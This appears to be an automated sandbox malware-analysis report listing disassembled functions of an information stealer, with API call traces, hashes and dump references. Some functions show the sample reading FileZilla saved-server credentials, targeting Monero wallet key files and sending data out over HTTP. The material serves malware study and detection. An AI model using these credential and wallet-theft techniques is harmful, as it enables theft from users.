                          • Instruction Fuzzy Hash: 016157F3A0C3009BE308AE2DDC957BABBE5EF94720F1A463DE7C583784E97554018692
                          Function 008EF31C Relevance: .2, Instructions: 184COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 85b8680ee9730a6766022511b985b81720293391f5ad87f649248ab40f10db18
                          • Instruction ID: 85f3b7b66aa3dc1ba8797239a77f38ac39ea8cc70e8a6d5ef57e6a48e8fdd0c9
                          • Opcode Fuzzy Hash: 85b8680ee9730a6766022511b985b81720293391f5ad87f649248ab40f10db18
                          • Instruction Fuzzy Hash: 9C516AF3E092105BE308AE2EDD8427AF7E6EBC0310F168A3DE6C597748E93548058796
                          Function 009C0A82 Relevance: .2, Instructions: 163COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad5994a4fcf035f9c11ad4c495a2f919bb2c25b50c1d7a521b6fbd364073f4f0
                          • Instruction ID: 76edcf9a186f4c777bedd046873cb930bf737ad32782402f9f132485dbe18406
                          • Opcode Fuzzy Hash: ad5994a4fcf035f9c11ad4c495a2f919bb2c25b50c1d7a521b6fbd364073f4f0
                          • Instruction Fuzzy Hash: 9E5116B390C3149BE3486E38EC8536AF7E5EB54320F06463CEAC993780EA795C058787
                          Function 008A6328 Relevance: .1, Instructions: 142COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ee722a1e141c9ced211bac71d9b3096827e8bfd716b64c8b15248d05e11db12
                          • Instruction ID: d204a6babaad465d6745360658bcc483e231de045098e36541143299e92657d3
                          • Opcode Fuzzy Hash: 1ee722a1e141c9ced211bac71d9b3096827e8bfd716b64c8b15248d05e11db12
                          • Instruction Fuzzy Hash: 764167F3E041205BE340992DDC447A7B6D6DFD8724F1B8639DB88D7784E93A8E0582C1
                          Function 00629750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00620250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 00628DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00628E0B
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006199EC
                            • Part of subcall function 006199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00619A11
                            • Part of subcall function 006199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00619A31
                            • Part of subcall function 006199C0: ReadFile.KERNEL32(000000FF,?,00000000,0061148F,00000000), ref: 00619A5A
                            • Part of subcall function 006199C0: LocalFree.KERNEL32(0061148F), ref: 00619A90
                            • Part of subcall function 006199C0: CloseHandle.KERNEL32(000000FF), ref: 00619A9A
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00630DBA,00630DB7,00630DB6,00630DB3), ref: 00620362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00620369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00620385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 006203CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 006203DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00620419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00620463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 0062051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 00620532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 0062054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00620562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00620571
                          • lstrcat.KERNEL32(?,url: ), ref: 00620580
                          • lstrcat.KERNEL32(?,00000000), ref: 00620593
                          • lstrcat.KERNEL32(?,00631678), ref: 006205A2
                          • lstrcat.KERNEL32(?,00000000), ref: 006205B5
                          • lstrcat.KERNEL32(?,0063167C), ref: 006205C4
                          • lstrcat.KERNEL32(?,login: ), ref: 006205D3
                          • lstrcat.KERNEL32(?,00000000), ref: 006205E6
                          • lstrcat.KERNEL32(?,00631688), ref: 006205F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00620604
                          • lstrcat.KERNEL32(?,00000000), ref: 00620617
                          • lstrcat.KERNEL32(?,00631698), ref: 00620626
                          • lstrcat.KERNEL32(?,0063169C), ref: 00620635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00630DB2), ref: 0062068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: cb81a2171fd59526d9fb53a5815a58cd30a015e0aeee55ce5ff8f9fb0e6d7fac
                          • Instruction ID: 09e1298dac6715b55ae9642cf470a72decdee3a3ce20202edca2e80f07249e38
                          • Opcode Fuzzy Hash: cb81a2171fd59526d9fb53a5815a58cd30a015e0aeee55ce5ff8f9fb0e6d7fac
                          • Instruction Fuzzy Hash: 49D13171900618ABDB44EBF0ED96DEE777AFF18301F444518F502A6091DF78AA0ACF66
                          Function 00615960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                            • Part of subcall function 006147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006159F8
                          • StrCmpCA.SHLWAPI(?,0111E858), ref: 00615A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00615B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0111E808,00000000,?,0111A270,00000000,?,00631A1C), ref: 00615E71
                          • lstrlen.KERNEL32(00000000), ref: 00615E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00615E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00615E9A
                          • lstrlen.KERNEL32(00000000), ref: 00615EAF
                          • lstrlen.KERNEL32(00000000), ref: 00615ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00615EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00615F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00615F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00615F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00615FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00615FBD
                          • HttpOpenRequestA.WININET(00000000,0111E898,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00615BF8
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • InternetCloseHandle.WININET(00000000), ref: 00615FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: d5773cd0af6dc4dba72a7d7b38410254199fce91ba6765cc44a103badc161d75
                          • Instruction ID: f67768e94993c5838de6cd073ac380503156bee52485a5e3ec78c4d6fd457a2d
                          • Opcode Fuzzy Hash: d5773cd0af6dc4dba72a7d7b38410254199fce91ba6765cc44a103badc161d75
                          • Instruction Fuzzy Hash: 2312F171820528ABDB55EBE0EC95FEEB37ABF14700F50419DF10662091DFB42A49CF6A
                          Function 0061CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 00628B60: GetSystemTime.KERNEL32(00630E1A,0111A3C0,006305AE,?,?,006113F9,?,0000001A,00630E1A,00000000,?,01119148,?,\Monero\wallet.keys,00630E17), ref: 00628B86
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0061CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0061D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0061D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D208
                          • lstrcat.KERNEL32(?,00631478), ref: 0061D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D22A
                          • lstrcat.KERNEL32(?,0063147C), ref: 0061D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D24C
                          • lstrcat.KERNEL32(?,00631480), ref: 0061D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D26E
                          • lstrcat.KERNEL32(?,00631484), ref: 0061D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D290
                          • lstrcat.KERNEL32(?,00631488), ref: 0061D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D2B2
                          • lstrcat.KERNEL32(?,0063148C), ref: 0061D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0061D2D4
                          • lstrcat.KERNEL32(?,00631490), ref: 0061D2E3
                            • Part of subcall function 0062A820: lstrlen.KERNEL32(00614F05,?,?,00614F05,00630DDE), ref: 0062A82B
                            • Part of subcall function 0062A820: lstrcpy.KERNEL32(00630DDE,00000000), ref: 0062A885
                          • lstrlen.KERNEL32(?), ref: 0061D32A
                          • lstrlen.KERNEL32(?), ref: 0061D339
                            • Part of subcall function 0062AA70: StrCmpCA.SHLWAPI(01119008,0061A7A7,?,0061A7A7,01119008), ref: 0062AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0061D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 5680fea988641bbf5a8d2552448a98d844ed6e6476725d42bc12bb18c72fce8e
                          • Instruction ID: 85ec214391fdd6d90d0952043e0cd889531d8d2f15ba076073a4f1237ced9922
                          • Opcode Fuzzy Hash: 5680fea988641bbf5a8d2552448a98d844ed6e6476725d42bc12bb18c72fce8e
                          • Instruction Fuzzy Hash: 41E13171910518ABCB48EBE0ED96EEE737ABF14301F10415CF507A6091DE79AE09CFA6
                          Function 0061C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0111D128,00000000,?,0063144C,00000000,?,?), ref: 0061CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0061CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0061CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0061CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0061CAD9
                          • StrStrA.SHLWAPI(?,0111D350,00630B52), ref: 0061CAF7
                          • StrStrA.SHLWAPI(00000000,0111D170), ref: 0061CB1E
                          • StrStrA.SHLWAPI(?,0111DD80,00000000,?,00631458,00000000,?,00000000,00000000,?,011190C8,00000000,?,00631454,00000000,?), ref: 0061CCA2
                          • StrStrA.SHLWAPI(00000000,0111DC40), ref: 0061CCB9
                            • Part of subcall function 0061C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0061C871
                            • Part of subcall function 0061C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0061C87C
                          • StrStrA.SHLWAPI(?,0111DC40,00000000,?,0063145C,00000000,?,00000000,01118FB8), ref: 0061CD5A
                          • StrStrA.SHLWAPI(00000000,01119238), ref: 0061CD71
                            • Part of subcall function 0061C820: lstrcat.KERNEL32(?,00630B46), ref: 0061C943
                            • Part of subcall function 0061C820: lstrcat.KERNEL32(?,00630B47), ref: 0061C957
                            • Part of subcall function 0061C820: lstrcat.KERNEL32(?,00630B4E), ref: 0061C978
                          • lstrlen.KERNEL32(00000000), ref: 0061CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0061CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
